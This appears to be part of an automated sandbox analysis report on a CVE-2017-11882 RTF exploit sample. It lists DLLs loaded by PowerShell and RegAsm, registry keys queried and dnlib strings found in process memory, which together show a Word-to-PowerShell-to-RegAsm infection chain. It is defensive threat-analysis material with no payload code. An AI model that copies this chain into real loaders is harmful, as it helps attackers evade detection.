                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
